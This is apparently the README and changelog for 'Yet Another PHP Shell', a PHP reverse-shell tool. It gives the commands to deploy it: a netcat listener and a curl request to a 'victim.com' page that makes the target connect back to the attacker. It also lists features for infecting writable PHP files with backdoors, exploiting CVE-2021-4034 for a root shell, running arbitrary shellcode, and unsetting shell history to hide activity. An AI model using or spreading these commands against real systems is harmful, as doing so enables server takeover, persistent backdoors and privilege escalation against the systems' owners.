Yet Another PHP Shell - The most complete PHP reverse shell
Yes, as the name reveals, this is yet another PHP reverse shell, one more among hundreds available out there, but with some advantages. It is a single PHP file containing all its functions, and you can control it via a simple TCP listener (e.g. nc -lp 1337).
In the current version (1.5), its main functions support only Linux systems, but I'm planning to make it work with Windows too.
It's currently in its first version and I haven't tested it much yet, and there are still many things I intend to do and improve for the next versions (it's not done yet!), so please let me know if you've found any bugs or have suggestions for features or improvements. =)
!interactive
rlwrap nc -lp <ip> <port>
curl -x POST -d "x=ip:port" victim.com/yaps.php
yaps.php?s or yaps.php?silent to suppress the banner
php yaps.php ip port
!help - Display the help menu
!all-colors - Toggle all colors (compatible with colorless TTY)
!color - Toggle PS1 color (locally only, no environment variable is changed)
!duplicate - Spawn another YAPS connection
!enum - Download LinPEAS and LinEnum to /tmp and get them ready to use
!info - List information about the target (the enumeration I mentioned above)
!infect - Infect writable PHP files with backdoors
!interactive - Spawn interactive reverse shells on other ports (works w/ sudo, su, mysql, etc.)
!passwd - Password option (enable, disable, set, modify)
!php - Write and run PHP on the remote host
!pwnkit - Tries to exploit CVE-2021-4034 and spawn a root reverse shell
!shellcode - Send and run shellcode on the remote host
!suggester - Download Linux Exploit Suggester to /tmp and get it ready to use
v1.5 - 12/02/2022
!shellcode to receive and run an arbitrary shellcode
duplicate() function (you can now a range of ports)
stabilize to interactive
v1.4 - 04/02/2022
!pwnkit to exploit CVE-2021-4034 and spawn a root reverse shell
verify_update() function
v1.3.1 - 01/08/2021
v1.3 - 28/07/2021
!infect to infect PHP files with backdoors
!stabilize payload (bugs fixed)
v1.2.2 - 18/07/2021
v1.2.1 - 17/07/2021
v1.2 - 17/07/2021
!duplicate to spawn another shell
--update|-u
--help|-h
php yaps.php ip port
v1.1 - 12/07/2021
!all-colors to toggle terminal colors and work with colorless TTYs
exit command to close socket (leave shell)
!stabilize to unset HISTSIZE and HISTFILE
!info
v1.0.1 - 08/07/2021
[x,y,z] to array(x,y,z) to improve compatibility with older PHP versions

Some ideas were inspired by these tools:
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
https://github.com/rebootuser/LinEnum
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
https://github.com/pentestmonkey/php-reverse-shell